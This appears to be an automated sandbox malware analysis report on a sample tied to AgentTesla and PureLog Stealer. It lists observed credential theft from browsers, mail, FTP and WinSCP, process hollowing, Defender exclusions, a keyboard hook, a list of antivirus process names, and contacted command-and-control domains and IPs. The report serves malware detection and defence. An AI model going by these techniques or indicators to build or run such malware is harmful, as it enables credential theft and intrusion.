Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF920C GetLocalTime, 0_2_02CF920C
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006E8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 13_2_006E8550
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFB78C GetVersionExA, 0_2_02CFB78C
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1832128642.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b66216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3f3c190.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3ecc190.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab6216.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70f08.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e75570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee5570.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e0950.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b6711e.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70f08.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.3.Native_neworigin.exe.8e7630.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.5010000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab6216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.Native_neworigin.exe.78d220.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3ecc190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab711e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.59e0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b66216.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee6478.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.5010000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.3.Native_neworigin.exe.8e7630.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b6711e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e76478.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e0950.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab711e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1632645650.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1630416908.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1845358079.0000000003E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1748806295.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1781418766.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1852623141.0000000005010000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara detected Credential Stealer
Source: Yara match File source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1832128642.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Native_neworigin.exe PID: 3976, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b66216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3f3c190.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3ecc190.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab6216.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70f08.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e75570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee5570.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e0950.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b6711e.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.4f70f08.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.3.Native_neworigin.exe.8e7630.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.5010000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab6216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.Native_neworigin.exe.78d220.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3ecc190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab711e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.59e0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e1858.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b66216.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee6478.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.5010000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.3.Native_neworigin.exe.8e7630.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.5120f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.Native_neworigin.exe.2b6711e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.3e76478.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.3.Native_neworigin.exe.6e0950.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.Native_neworigin.exe.2ab711e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1632645650.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1630416908.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1845358079.0000000003E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.1748806295.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1781418766.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1852623141.0000000005010000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562865 Sample: C6dAUcOA6M.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 114 zlenh.biz 2->114 116 zjbpaao.biz 2->116 118 61 other IPs or domains 2->118 130 Multi AV Scanner detection for domain / URL 2->130 132 Suricata IDS alerts for network traffic 2->132 134 Found malware configuration 2->134 136 18 other signatures 2->136 10 alg.exe 2->10         started        15 C6dAUcOA6M.exe 1 7 2->15         started        17 Juqmtmya.PIF 2->17         started        19 7 other processes 2->19 signatures3 process4 dnsIp5 120 lpuegx.biz 82.112.184.197, 49814, 49867, 49871 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 10->120 122 qpnczch.biz 18.246.231.120, 50055, 50065, 50077 AMAZON-02US United States 10->122 126 12 other IPs or domains 10->126 92 C:\Program Files\...\updater.exe, PE32+ 10->92 dropped 94 C:\Program Files\...\private_browsing.exe, PE32+ 10->94 dropped 96 C:\Program Files\...\plugin-container.exe, PE32+ 10->96 dropped 106 125 other malicious files 10->106 dropped 170 Creates files in the system32 config directory 10->170 172 Drops executable to a common third party application directory 10->172 174 Infects executable files (exe, dll, sys, html) 10->174 124 gxe0.com 198.252.105.91, 443, 49707, 49708 HAWKHOSTCA Canada 15->124 98 C:\Users\Public\Libraries\aymtmquJ.pif, PE32 15->98 dropped 100 C:\Users\Public\Libraries\aymtmquJ.cmd, DOS 15->100 dropped 102 C:\Users\Public\Libraries\Juqmtmya, data 15->102 dropped 104 C:\Users\Public\Juqmtmya.url, MS 15->104 dropped 176 Drops PE files with a suspicious file extension 15->176 178 Writes to foreign memory regions 15->178 180 Allocates memory in foreign processes 15->180 182 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 15->182 21 aymtmquJ.pif 4 15->21         started        25 cmd.exe 1 15->25         started        27 esentutl.exe 2 15->27         started        184 Sample uses process hollowing technique 17->184 29 aymtmquJ.pif 17->29         started        31 aymtmquJ.pif 19->31         started        file6 signatures7 process8 file9 84 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 21->84 dropped 86 C:\Users\user\...86ative_neworigin.exe, PE32 21->86 dropped 88 C:\Program Files (x86)\...\armsvc.exe, PE32 21->88 dropped 164 Drops executable to a common third party application directory 21->164 166 Infects executable files (exe, dll, sys, html) 21->166 33 Native_neworigin.exe 15 2 21->33         started        38 Trading_AIBot.exe 21->38         started        40 esentutl.exe 2 25->40         started        52 8 other processes 25->52 90 C:\Users\Public\Libraries\Juqmtmya.PIF, PE32 27->90 dropped 42 conhost.exe 27->42         started        44 Native_neworigin.exe 29->44         started        46 Trading_AIBot.exe 29->46         started        48 Native_neworigin.exe 31->48         started        50 Trading_AIBot.exe 31->50         started        signatures10 process11 dnsIp12 108 s82.gocheapweb.com 51.195.88.199, 49774, 49845, 49866 OVHFR France 33->108 110 acwjcqqv.biz 18.141.10.107, 49757, 49764, 49790 AMAZON-02US United States 33->110 112 4 other IPs or domains 33->112 70 C:\Windows\System32\alg.exe, PE32+ 33->70 dropped 72 C:\Windows\System32\FXSSVC.exe, PE32+ 33->72 dropped 74 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 33->74 dropped 82 3 other malicious files 33->82 dropped 138 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 33->138 140 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 33->140 142 Tries to steal Mail credentials (via file / registry access) 33->142 144 Infects executable files (exe, dll, sys, html) 33->144 76 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 38->76 dropped 146 Uses schtasks.exe or at.exe to add and modify task schedules 38->146 148 Drops large PE files 38->148 150 Adds a directory exclusion to Windows Defender 38->150 54 powershell.exe 38->54         started        57 schtasks.exe 38->57         started        59 apihost.exe 38->59         started        78 C:\Users\Public\alpha.pif, PE32 40->78 dropped 152 Drops PE files to the user root directory 40->152 154 Drops PE files with a suspicious file extension 40->154 156 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 40->156 158 Tries to harvest and steal ftp login credentials 44->158 160 Tries to harvest and steal browser information (history, passwords, etc) 44->160 162 Installs a global keyboard hook 44->162 80 C:\Users\Public\xpha.pif, PE32 52->80 dropped 61 xpha.pif 52->61         started        file13 signatures14 process15 dnsIp16 168 Loading BitLocker PowerShell Module 54->168 64 conhost.exe 54->64         started        66 WmiPrvSE.exe 54->66         started        68 conhost.exe 57->68         started        128 127.0.0.1 unknown unknown 61->128 signatures17 process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
165.160.15.20
 myups.biz United States
19574 CSCUS false
3.254.94.185
 uaafd.biz United States
16509 AMAZON-02US false
3.94.10.34
 ytctnunms.biz United States
14618 AMAZON-AESUS false
34.246.200.160
 tbjrpv.biz United States
16509 AMAZON-02US false
198.252.105.91
 gxe0.com Canada
20068 HAWKHOSTCA true
172.234.222.143
 przvgke.biz United States
20940 AKAMAI-ASN1EU false
18.208.156.248
 gnqgo.biz United States
14618 AMAZON-AESUS false
34.211.97.45
 vrrazpdh.biz United States
16509 AMAZON-02US false
208.100.26.245
 gytujflc.biz United States
32748 STEADFASTUS false
35.164.78.200
 nqwjmb.biz United States
16509 AMAZON-02US false
172.234.222.138
 fwiwk.biz United States
20940 AKAMAI-ASN1EU false
51.195.88.199
 s82.gocheapweb.com France
16276 OVHFR true
44.221.84.105
 hehckyov.biz United States
14618 AMAZON-AESUS false
85.214.228.140
 dlynankz.biz Germany
6724 STRATOSTRATOAGDE false
54.244.188.177
 pywolwnvd.biz United States
16509 AMAZON-02US true
13.251.16.150
 sxmiywsfv.biz United States
16509 AMAZON-02US false
47.129.31.212
 xlfhhhm.biz Canada
34533 ESAMARA-ASRU false
18.246.231.120
 vyome.biz United States
16509 AMAZON-02US true
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false
82.112.184.197
 vjaxhpbji.biz Russian Federation
43267 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU true
18.141.10.107
 warkcdu.biz United States
16509 AMAZON-02US true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
uaafd.biz 3.254.94.185 true
vjaxhpbji.biz 82.112.184.197 true
pywolwnvd.biz 54.244.188.177 true
s82.gocheapweb.com 51.195.88.199 true
ytctnunms.biz 3.94.10.34 true
